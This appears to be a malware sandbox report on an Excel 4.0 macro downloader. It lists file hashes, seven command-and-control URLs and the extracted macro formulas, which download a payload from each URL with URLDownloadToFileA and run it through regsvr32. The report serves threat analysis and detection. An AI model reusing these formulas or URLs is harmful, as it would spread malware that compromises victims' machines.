General

  • Target

    3de6e152fbe4de6db133082ce82a68cba9d5c7cc48a51caba755a9441d0fc2c0

  • Size

    35KB

  • Sample

    241120-mgsfnazndk

  • MD5

    fb5bfafec7ad3aceae2ab864c5f42fe1

  • SHA1

    c570d2f2d933a27fe02a0c2b5416a0dae1011c84

  • SHA256

    3de6e152fbe4de6db133082ce82a68cba9d5c7cc48a51caba755a9441d0fc2c0

  • SHA512

    01cb93465b941ea8b98f53eafa6b70ef41d41ddde6ab867e42979e21c5d0222f8e763a306bb19232d2256a31f066898fb4a627db28e9a208ee49a9ee9abe945d

  • SSDEEP

    768:qYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:qYKtmg+UOZZ1ZYpoQ/pMAm

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://casinojackpotking.com/cgi-bin/47sKbklSQf31/

https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/

https://directorkay.com.ng/wp-admin/MYP3NA/

https://deatravel.al/wp-includes/H544R/

https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/

https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/

https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0)
    =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0))
    =IF('EGVSBSR'!C28<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")
    =RETURN()

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.